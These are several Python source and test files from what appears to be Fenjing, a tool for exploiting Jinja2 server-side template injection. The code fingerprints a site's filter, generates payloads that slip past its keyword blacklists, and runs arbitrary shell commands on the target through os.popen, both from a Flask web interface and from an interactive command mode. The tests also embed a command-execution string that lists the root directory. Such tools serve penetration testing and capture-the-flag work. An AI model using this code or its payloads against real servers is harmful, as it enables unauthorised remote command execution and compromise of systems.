# pylint: skip-file
# flake8: noqa

import sys

sys.path.append("..")
from fenjing.form import get_form
from fenjing.requester import Requester
import unittest
import fenjing
from typing import Union
from fenjing.cracker import Cracker
from fenjing.submitter import FormSubmitter, HTTPResponse
from fenjing import const
import logging
import os

VULUNSERVER_ADDR = os.environ["VULUNSERVER_ADDR"]


class CrackerTestBase(unittest.TestCase):
    def setUp(self):
        super().setUp()
        self.blacklist = ["."]
        self.subm = FormSubmitter(
            url=VULUNSERVER_ADDR,
            form=get_form(action="/", inputs=["name"], method="GET"),
            target_field="name",
            requester=Requester(interval=0.01),
        )

    def test_waf(self):
        cracker = Cracker(self.subm)
        full_payload_gen = cracker.crack()
        self.assertIsNotNone(full_payload_gen)
        payload, _ = full_payload_gen.generate(
            const.OS_POPEN_READ,
            "echo 'cracked! @m wr!tI1111ng s()th' " + self.__class__.__name__,
        )
        self.assertIsNotNone(payload)
        resp = self.subm.submit(payload)
        assert resp is not None
        self.assertIn("cracked! @m wr!tI1111ng s()th", resp.text)


class CrackerTestHard(CrackerTestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = [
            "config",
            "self",
            "g",
            "os",
            "class",
            "length",
            "mro",
            "base",
            "lipsum",
            # "os",
            # "import",
            # "x",
            # "url",
            # "globals",
            # "cycler",
            "[",
            '"',
            "'",
            "_",
            ".",
            "+",
            "~",
            "{{",
        ]


class CrackerTestWeird(CrackerTestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = [
            "[",
            '"',
            "'",
            "_",
            ".",
            "+",
            "~",
            "{{",
        ]




"""根据指定的表单生成对应的WAF函数

"""

from collections import Counter, namedtuple
from functools import lru_cache
import logging
from typing import Dict, Callable, Union, List
import random
import string
from copy import copy

from .const import DETECT_MODE_ACCURATE, DETECT_MODE_FAST, DANGEROUS_KEYWORDS
from .submitter import Submitter
from .colorize import colored


logger = logging.getLogger("waf_func_gen")
Result = namedtuple("Result", "payload_generate_func input_field")

dangerous_keywords = copy(DANGEROUS_KEYWORDS)

random.shuffle(dangerous_keywords)
render_error_keywords = ["TemplateSyntaxError", "Internal Server Error"]


class WafFuncGen:
    """
    根据指定的Submitter(表单submitter或者路径submitter)生成对应的WAF函数
    其会使用一系列经常被waf的payload进行测试，然后根据返回页面的哈希判断其他payload是否被waf
    """

    def __init__(
        self,
        submitter: Submitter,
        callback: Union[Callable[[str, Dict], None], None] = None,
        detect_mode: str = DETECT_MODE_ACCURATE,
    ):
        self.subm = submitter
        self.callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.detect_mode = detect_mode

    def waf_page_hash(self):
        """使用危险的payload测试对应的input，得到一系列响应后，求出响应中最常见的几个hash

        Returns:
            List[int]: payload被waf后页面对应的hash
        """
        composed_test_keywords = [
            "".join(dangerous_keywords[i: i + 3])  # flake8: noqa
            for i in range(0, len(dangerous_keywords), 3)
        ]
        test_keywords = composed_test_keywords
        if self.detect_mode == DETECT_MODE_ACCURATE:
            test_keywords += dangerous_keywords
        hashes: List[int] = []
        for keyword in test_keywords:
            logger.info(
                "Testing dangerous keyword %s",
                colored("yellow", repr(keyword * 2)),
            )
            result = self.subm.submit(keyword * 2)
            if result is None:
                logger.info(
                    "Submit %s for %s",
                    colored("yellow", "failed"),
                    colored("yellow", repr(keyword * 2)),
                )
                continue
            status_code, text = result
            if status_code == 500:
                continue
            hashes.append(hash(text))

        return [k for k, v in Counter(hashes).items() if v >= 2]

    def generate(self) -> Callable:
        """生成WAF函数

        Returns:
            Callable: WAF函数
        """
        waf_hashes = self.waf_page_hash()
        # 随着检测payload一起提交的附加内容
        # content: 内容本身，passed: 内容是否确认可以通过waf
        extra_content, extra_passed = (
            "".join(random.choices(string.ascii_lowercase, k=6)),
            False,
        )

        @lru_cache(1000)
        def waf_func(value):
            nonlocal extra_content, extra_passed
            for _ in range(5):
                result = self.subm.submit(extra_content + value)
                if result is None:
                    return False
                # status_code, text = result

                # 遇到500时，判断是否是Jinja渲染错误，是则返回True
                if result.status_code == 500:
                    return any(
                        w in result.text for w in render_error_keywords
                    )
                # 产生回显
                if extra_content in result.text:
                    return True
                # 页面的hash和waf页面的hash不相同
                if hash(result.text) not in waf_hashes:
                    return True
                # 页面的hash和waf的相同，但是用户要求检测模式为快速
                # 因此我们选择直接返回False
                if self.detect_mode == DETECT_MODE_FAST:
                    return False
                # 如果extra_content之前检测过，则可以确定不是它产生的问题，返回False
                if extra_passed:
                    return False
                # 检测是否是extra_content导致的WAF
                # 如果是的话更换extra_content并重新检测
                extra_content_result = self.subm.submit(extra_content)
                if (
                    extra_content_result is not None
                    and extra_content_result.status_code != 500
                    and hash(extra_content_result.text) in waf_hashes
                ):
                    extra_content = "".join(
                        random.choices(string.ascii_lowercase, k=6)
                    )
                    continue
                extra_passed = True
                return False
            # 五次检测都失败，我们选择直接返回False
            return False

        return waf_func



# pylint: skip-file
# flake8: noqa
from flask import Flask, render_template, request, jsonify
from typing import Union
import logging
import threading
import uuid
from urllib.parse import urlparse

from .form import get_form, Form
from .cracker import Cracker
from .submitter import Submitter, FormSubmitter
from .full_payload_gen import FullPayloadGen
from .requester import Requester
from .const import (
    CALLBACK_GENERATE_FULLPAYLOAD,
    CALLBACK_GENERATE_PAYLOAD,
    CALLBACK_PREPARE_FULLPAYLOADGEN,
    CALLBACK_SUBMIT,
    CALLBACK_TEST_FORM_INPUT,
    APICODE_OK,
    APICODE_WRONG_INPUT,
    DEFAULT_USER_AGENT,
    OS_POPEN_READ,
)

logger = logging.getLogger("webui")
app = Flask(__name__)
tasks = {}


class CallBackLogger:
    def __init__(self, flash_messages, messages):
        self.flash_messages = flash_messages
        self.messages = messages

    def callback_prepare_fullpayloadgen(self, data):
        self.messages.append("上下文payload测试完毕。")
        if data["context"]:
            context_repr = ", ".join(
                f"{k}={repr(v)}" for k, v in data["context"].items()
            )
            self.messages.append(f"以下是在上下文中的值：{context_repr}")
        else:
            self.messages.append(f"没有上下文payload可以通过waf。。。")
        if not data["will_print"]:
            self.messages.append(f"生成的payload将不会具有回显。")

    def callback_generate_fullpayload(self, data):
        payload = (
            data["payload"]
            if len(data["payload"]) < 30
            else data["payload"][:30] + "..."
        )
        self.messages.append(
            f"分析完毕，已为类型{data['gen_type']}生成payload {payload}"
        )
        if not data["will_print"]:
            self.messages.append(f"payload将不会产生回显")

    def callback_generate_payload(self, data):
        payload_repr = data["payload"]
        if len(payload_repr) > 100:
            payload_repr = payload_repr[:100] + "..."
        self.flash_messages.append(
            "请求{req}对应的payload可以是{payload}".format(
                req=f"{data['gen_type']}({', '.join(repr(arg) for arg in data['args'])})",
                payload=payload_repr,
            )
        )

    def callback_submit(self, data):
        if data.get("type", "form"):
            self.flash_messages.append(
                f"提交表单完成，返回值为{data['response'].status_code}，输入为{data['inputs']}，表单为{data['form']}"
            )
        else:
            self.flash_messages.append(
                f"提交payload完成，返回值为{data['response'].status_code}，提交payload为{data['payload']}"
            )

    def callback_test_form_input(self, data):
        if not data["ok"]:
            return
        testsuccess_msg = (
            "payload测试成功！" if data["test_success"] else "payload测试失败。"
        )
        will_print_msg = "其会产生回显。" if data["will_print"] else "其不会产生回显。"
        self.messages.append(testsuccess_msg + will_print_msg)

    def __call__(self, callback_type, data):
        def default_handler(data):
            return logger.warning(f"callback_type={callback_type} not found")

        return {
            CALLBACK_PREPARE_FULLPAYLOADGEN: self.callback_prepare_fullpayloadgen,
            CALLBACK_GENERATE_FULLPAYLOAD: self.callback_generate_fullpayload,
            CALLBACK_GENERATE_PAYLOAD: self.callback_generate_payload,
            CALLBACK_SUBMIT: self.callback_submit,
            CALLBACK_TEST_FORM_INPUT: self.callback_test_form_input,
        }.get(callback_type, default_handler)(data)


class CrackTaskThread(threading.Thread):
    def __init__(self, taskid, url, form: Form, interval):
        super().__init__()
        self.success = False
        self.taskid = taskid
        self.form = form
        self.url = url
        self.flash_messages = []
        self.messages = []
        self.callback = CallBackLogger(self.flash_messages, self.messages)
        self.submitter: Union[Submitter, None] = None
        self.cracker: Union[Cracker, None]
        self.requester = Requester(
            interval=interval, user_agent=DEFAULT_USER_AGENT
        )

    def run(self):
        for input_field in self.form["inputs"]:
            self.messages.append(f"开始分析表单项{input_field}")
            self.submitter = FormSubmitter(
                self.url,
                self.form,
                input_field,
                self.requester,
                self.callback,
            )
            self.cracker = Cracker(self.submitter, self.callback)
            if not self.cracker.has_respond():
                continue
            self.full_payload_gen = self.cracker.crack()
            if self.full_payload_gen:
                self.messages.append(f"WAF已绕过，现在可以执行Shell指令了")
                self.success = True
                break
            continue
        if not self.full_payload_gen:
            self.messages.append(f"WAF绕过失败")


class InteractiveTaskThread(threading.Thread):
    def __init__(
        self,
        taskid: str,
        submitter: Submitter,
        full_payload_gen: FullPayloadGen,
        cmd: str,
    ):
        super().__init__()
        self.taskid = taskid
        self.submitter = submitter
        self.full_payload_gen = full_payload_gen
        self.cmd = cmd

        self.flash_messages = []
        self.messages = []
        self.callback = CallBackLogger(self.flash_messages, self.messages)

        self.submitter.callback = self.callback
        self.full_payload_gen.callback = self.callback

    def run(self):
        self.messages.append(f"开始生成payload")
        payload, will_print = self.full_payload_gen.generate(
            OS_POPEN_READ, self.cmd
        )
        if not payload:
            self.messages.append(f"payload生成失败")
            return
        if not will_print:
            self.messages.append(f"此payload不会产生回显")
        resp = self.submitter.submit(payload)
        assert resp is not None
        self.messages.append(f"提交payload的回显如下：")
        self.messages.append(resp.text)


@app.route("/")
def index():
    return render_template("index.html")


def create_crack_task(url, method, inputs, action, interval):
    assert url != "" and inputs != "", "wrong param"
    form = get_form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(","),
    )
    taskid = uuid.uuid4().hex
    task = CrackTaskThread(taskid, url, form, float(interval))
    task.daemon = True
    task.start()
    tasks[taskid] = task
    return taskid


def create_interactive_id(cmd, last_task):
    assert cmd != "", "wrong param"
    submitter, full_payload_gen = (
        last_task.submitter,
        last_task.full_payload_gen,
    )
    taskid = uuid.uuid4().hex
    task = InteractiveTaskThread(taskid, submitter, full_payload_gen, cmd)
    task.daemon = True
    task.start()
    tasks[taskid] = task
    return taskid


@app.route(
    "/createTask",
    methods=[
        "POST",
    ],
)  # type: ignore
def create_task():
    if request.form.get("type", None) not in ["crack", "interactive"]:
        logging.info(request.form)
        return jsonify(
            {
                "code": APICODE_WRONG_INPUT,
                "message": f"unknown type {request.form.get('type', None)}",
            }
        )
    task_type = request.form.get("type", None)
    if task_type == "crack":
        taskid = create_crack_task(
            request.form["url"],
            request.form["method"],
            request.form["inputs"],
            request.form["action"],
            request.form["interval"],
        )
        return jsonify({"code": APICODE_OK, "taskid": taskid})
    elif task_type == "interactive":
        cmd, last_task_id = (
            request.form["cmd"],
            request.form["last_task_id"],
        )
        if last_task_id not in tasks:
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": f"last_task_id not found: {last_task_id}",
                }
            )
        last_task = tasks[last_task_id]
        if not isinstance(last_task, CrackTaskThread):
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": f"last_task_id not found: {last_task_id}",
                }
            )
        if not last_task.success :
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": f"specified last_task failed: {last_task_id}",
                }
            )
        taskid = create_interactive_id(cmd, last_task)
        return jsonify({"code": APICODE_OK, "taskid": taskid})


@app.route(
    "/watchTask",
    methods=[
        "POST",
    ],
)  # type: ignore
def watchTask():
    if "taskid" not in request.form:
        return jsonify(
            {"code": APICODE_WRONG_INPUT, "message": "taskid not provided"}
        )
    if request.form["taskid"] not in tasks:
        return jsonify(
            {
                "code": APICODE_WRONG_INPUT,
                "message": f"task not found: {request.form['taskid']}",
            }
        )
    task: CrackTaskThread = tasks[request.form["taskid"]]
    if isinstance(task, CrackTaskThread):
        return jsonify(
            {
                "code": APICODE_OK,
                "taskid": task.taskid,
                "done": not task.is_alive(),
                "messages": task.messages,
                "flash_messages": task.flash_messages,
                "success": task.success,
            }
        )
    elif isinstance(task, InteractiveTaskThread):
        return jsonify(
            {
                "code": APICODE_OK,
                "taskid": task.taskid,
                "done": not task.is_alive(),
                "messages": task.messages,
                "flash_messages": task.flash_messages,
            }
        )


def main(host="127.0.0.1", port=11451):
    app.run(host=host, port=port)


if __name__ == "__main__":
    main()



"""攻击指定的路径

"""

from hashlib import new
import logging
import random
from collections import namedtuple
from string import ascii_lowercase
from typing import Union, Callable, Dict

from .submitter import FormSubmitter, RequestSubmitter, Submitter
from .colorize import colored
from .const import (
    ATTRIBUTE,
    CHAINED_ATTRIBUTE_ITEM,
    EVAL,
    LITERAL,
    OS_POPEN_READ,
    DETECT_MODE_ACCURATE,
)
from .waf_func_gen import WafFuncGen
from .full_payload_gen import FullPayloadGen
from fenjing import submitter

logger = logging.getLogger("cracker")
Result = namedtuple("Result", "full_payload_gen input_field")


class Cracker:
    test_cmd = "echo f3n  j1ng;"
    test_eval = "'f'+str(3)+'n j'+str(1)+\"ng\""
    test_result = "f3n j1ng"

    def __init__(
        self,
        submitter: Submitter,
        callback: Union[Callable[[str, Dict], None], None] = None,
        detect_mode: str = DETECT_MODE_ACCURATE,
    ):
        self.detect_mode = detect_mode
        self.subm = submitter

        self._callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.waf_func_gen = WafFuncGen(
            submitter, callback=callback, detect_mode=detect_mode
        )

    @property
    def callback(self):
        """Callback函数

        Returns:
            Callable: Callback函数
        """
        return self._callback

    @callback.setter
    def callback(self, callback):
        self._callback = callback
        self.waf_func_gen.callback = callback

    def test_payload(self, payload: str):
        logger.info(
            "Testing generated payload.",
        )
        result = self.subm.submit(payload)
        assert result is not None
        _, text = result
        return self.test_result in text

    def test_payload_eval_args(self, payload: str, subm: Submitter):
        logger.info(
            "Testing generated payload as eval args.",
        )
        result = subm.submit(payload)
        assert result is not None
        _, text = result
        return self.test_result in text

    def has_respond(self):
        content = "".join(random.choices(ascii_lowercase, k=6))
        resp = self.subm.submit(content)
        assert resp is not None
        return content in resp.text

    def crack(self):
        logger.info("Cracking...")
        waf_func = self.waf_func_gen.generate()
        full_payload_gen = FullPayloadGen(
            waf_func, callback=None, detect_mode=self.detect_mode
        )
        payload, will_print = full_payload_gen.generate(OS_POPEN_READ, self.test_cmd)
        if payload is None:
            return None
        # payload测试成功时为True, 失败时为False, 无法测试为None
        if will_print:
            if self.test_payload(payload):
                logger.info(
                    "%s Now we can generate payloads.",
                    colored("green", "Success!", bold=True),
                )
            else:
                logger.info(
                    "%s! Generated payloads might be useless.",
                    colored("yellow", "Test Payload Failed", bold=True),
                )
        else:
            logger.info(
                "We WON'T SEE the execution result! "
                + "You can try generating payloads anyway.",
            )
        return full_payload_gen

    def crack_eval_args(self):
        logger.info("Cracking with request GET args...")
        assert isinstance(
            self.subm, FormSubmitter
        ), "Currently onlu FormSubmitter is supported"
        waf_func = self.waf_func_gen.generate()
        full_payload_gen = FullPayloadGen(
            waf_func, callback=None, detect_mode=self.detect_mode
        )
        args_target_field = "x"
        payload, will_print = full_payload_gen.generate(
            EVAL,
            (
                CHAINED_ATTRIBUTE_ITEM,
                (LITERAL, "request"),
                (ATTRIBUTE, "args"),
                (ATTRIBUTE, args_target_field),
            ),
        )
        if payload is None:
            return None
        assert will_print is not None, "It just shouldn't! when payload is not None!"
        payload_dict = {self.subm.target_field: payload}
        method = self.subm.form["method"]
        assert isinstance(method, str)
        new_subm = RequestSubmitter(
            url=self.subm.url,
            method=method,
            target_field=args_target_field,
            params=payload_dict if method == "GET" else {},
            data=payload_dict if method != "GET" else {},
            requester=self.subm.req,
        )
        if self.subm.tamperers:
            for tamperer in self.subm.tamperers:
                new_subm.add_tamperer(tamperer)
        if will_print:
            if self.test_payload_eval_args(self.test_eval, new_subm):
                logger.info(
                    "%s Now we can generate payloads.",
                    colored("green", "Success!", bold=True),
                )
            else:
                logger.info(
                    "%s! Generated payloads might be useless.",
                    colored("yellow", "Test Payload Failed", bold=True),
                )
        else:
            logger.info(
                "We WON'T SEE the execution result! "
                + "You can try generating payloads anyway.",
            )

        return full_payload_gen, new_subm, will_print



import sys  # noqa

sys.path.append("..")  # noqa

import unittest
import fenjing
from flask import render_template_string


from fenjing.payload_gen import PayloadGenerator
from fenjing import const
import logging

fenjing.payload_gen.logger.setLevel(logging.ERROR)
logging.basicConfig(level=logging.INFO)


def get_payload_gen(blacklist, context):
    def waf_func(x):
        return all(word not in x for word in blacklist)

    return PayloadGenerator(waf_func, context)


class PayloadGenTestCaseSimple(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            [
                "[",
            ],
            {},
        )

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class PayloadGenTestCaseNoNumber(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"],
            {
                "l": 1,
                "e": 3,
                "lo": 10,
                "loo": 100,
                "eoo": 300,
            },
        )

    def test_integers(self):
        for num in range(1, 128):
            self.assertIsNotNone(self.payload_gen.generate(const.INTEGER, num))

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class PayloadGenTestCaseHard(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            [
                "config",
                "self",
                "g",
                "os",
                "class",
                "length",
                "mro",
                "base",
                "lipsum",
                "[",
                '"',
                "'",
                "_",
                ".",
                "+",
                "~",
                "{{",
                "0",
                "1",
                "2",
                "3",
                "4",
                "5",
                "6",
                "7",
                "8",
                "9",
                "０",
                "１",
                "２",
                "３",
                "４",
                "５",
                "６",
                "７",
                "８",
                "９",
            ],
            {
                "l": 1,
                "e": 3,
                "lo": 10,
                "loo": 100,
                "eoo": 300,
            },
        )

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )



"""完整payload的生成器，生成包括双花括号在内的所有部分

"""

from typing import Callable, Tuple, Union, Dict, Any
import logging

from . import payload_gen
from .colorize import colored
from .context_vars import (
    context_payloads_all,
    filter_by_used_context,
    filter_by_waf,
)
from .const import (
    CALLBACK_PREPARE_FULLPAYLOADGEN,
    CALLBACK_GENERATE_FULLPAYLOAD,
    DETECT_MODE_ACCURATE,
)

logger = logging.getLogger("full_payload_gen")


def get_outer_pattern(
    waf_func: Callable,
) -> Union[Tuple[str, bool], Tuple[None, None]]:
    """根据WAF函数获取payload最外层的结构，一般为双花括号

    Args:
        waf_func (Callable): WAF函数

    Returns:
        Union[Tuple[str, bool], Tuple[None, None]]:
            最外层的结构，以及这个结构是否会产生回显
            生成失败则返回None
    """
    outer_payloads = [
        ("{{}}", "{{PAYLOAD}}", True),
        ("{%print()%}", "{%print(PAYLOAD)%}", True),
        ("{%if()%}{%endif%}", "{%if(PAYLOAD)%}{%endif%}", False),
        ("{% set x= %}", "{% set x=PAYLOAD %}", False),
    ]
    for test_payload, outer_pattern, will_print in outer_payloads:
        if waf_func(test_payload):
            return outer_pattern, will_print
    logger.warning("LOTS OF THINGS is being waf, NOTHING FOR YOU!")
    return None, None


def context_payloads_to_context(
    context_payload: Dict[str, Dict[str, Any]]
) -> Dict[str, Any]:
    """将context_payload转换成context字典。

    Args:
        context_payload (Dict[str, Dict[str, Any]]): 一个存储着payload以及对应上下文的字典

    Returns:
        Dict[str, Any]: 一个字典，键是变量名，值是变量值
    """
    return {
        var_name: var_value
        for _, d in context_payload.items()
        for var_name, var_value in d.items()
    }


class FullPayloadGen:
    """接受一个waf函数并负责生成payload
    waf函数接受一个字符串并返回这个字符串是否可以通过WAF
    payload由两部分组成：
        - 前方提供变量等上下文的上下文payload（一般为{%set xxx=xxx%}的形式）
        - 以及后方实际发挥作用的作用payload（一般被双花括号{{}}包裹）
    """

    def __init__(
        self,
        waf_func: Callable[
            [
                str,
            ],
            bool,
        ],
        callback: Union[Callable[[str, Dict], None], None] = None,
        detect_mode: str = DETECT_MODE_ACCURATE,
    ):
        self.__slot__ = [
            "waf_func",
            "prepared",
            "_callback",
            "context_payload",
            "context",
            "outer_pattern",
            "will_print",
        ]
        self.waf_func = waf_func
        self.prepared = False
        self._callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.context_payload = context_payloads_all
        self.context = context_payloads_to_context(self.context_payload)
        self.outer_pattern, self.will_print = None, None
        self.payload_gen = None
        self.detect_mode = detect_mode

    @property
    def callback(self):
        """Callback函数，在进行某些步骤是会被调用以传递运行时的信息

        Returns:
            Callable: callback函数
        """
        return self._callback

    @callback.setter
    def callback(self, callback):
        self._callback = callback
        if self.payload_gen:
            self.payload_gen.callback = callback

    def do_prepare(self) -> bool:
        """准备作用payload的最外层（一般为双花括号{{}}），过滤所有可用的payload

        Returns:
            bool: 是否生成成功，失败则无法生成payload。
        """
        if self.prepared:
            return True

        self.context_payload = filter_by_waf(
            self.context_payload, self.waf_func
        )

        self.context = context_payloads_to_context(self.context_payload)

        self.outer_pattern, self.will_print = get_outer_pattern(self.waf_func)
        if not self.outer_pattern:
            return False
        if self.will_print:
            logger.info("use %s", colored("blue", self.outer_pattern))
        else:
            logger.warning(
                "use %s, which %s your result!",
                colored("blue", self.outer_pattern),
                colored("red", "will not print"),
            )

        self.payload_gen = payload_gen.PayloadGenerator(
            self.waf_func,
            self.context,
            self.callback,
            detect_mode=self.detect_mode,
        )
        self.prepared = True
        self.callback(
            CALLBACK_PREPARE_FULLPAYLOADGEN,
            {
                "context": self.context,
                "outer_pattern": self.outer_pattern,
                "will_print": self.will_print,
            },
        )
        return True

    def add_context_variable(
        self,
        payload: str,
        context_vars: Dict[str, Any],
        check_waf: bool = True,
    ) -> bool:
        """将提供上下文变量以及对应payload加入payload生成器中，需要先调用.do_prepare函数

        Args:
            payload (str): 上下文变量对应的payload
            context_vars (Dict[str, Any]): 所有上下文变量，键是变量名，值是变量值
            check_waf (bool, optional):
                是否使用waf函数检查传入的payload. Defaults to True.

        Raises:
            Exception: 需要先调用.do_prepare函数，否则抛出exception

        Returns:
            bool: 是否通过waf函数，不检查waf则永远为True
        """
        if not self.prepared:
            raise RuntimeError("Please run .do_prepare() first")
        if check_waf and self.waf_func(payload):
            return False
        self.context_payload[payload] = context_vars
        self.context = context_payloads_to_context(self.context_payload)
        return True

    def generate(
        self, gen_type, *args
    ) -> Tuple[Union[str, None], Union[bool, None]]:
        """根据要求生成payload

        Args:
            gen_type (str): 生成payload的类型，应传入如OS_POPEN_READ等在const.py中定义的类型

        Returns:
            Tuple[Union[str, None], Union[bool, None]]:
                payload, 以及payload是否会有回显
        """
        if not self.prepared and not self.do_prepare():
            return None, None

        assert (
            self.payload_gen is not None
        ), "when prepared, we should have payload_gen"

        ret = self.payload_gen.generate_with_used_context(gen_type, *args)

        if ret is None:
            logger.warning("Bypassing WAF Failed.")
            return None, None
        inner_payload, used_context = ret
        context_payload = "".join(
            filter_by_used_context(self.context_payload, used_context).keys()
        )
        assert isinstance(self.outer_pattern, str)

        payload = context_payload + self.outer_pattern.replace(
            "PAYLOAD", inner_payload
        )

        self.callback(
            CALLBACK_GENERATE_FULLPAYLOAD,
            {
                "gen_type": gen_type,
                "args": args,
                "payload": payload,
                "will_print": self.will_print,
            },
        )
        if not self.will_print:
            logger.warning(
                "use %s, which %s your result!",
                colored("blue", self.outer_pattern),
                colored("red", "will not print"),
            )
        return (payload, self.will_print)
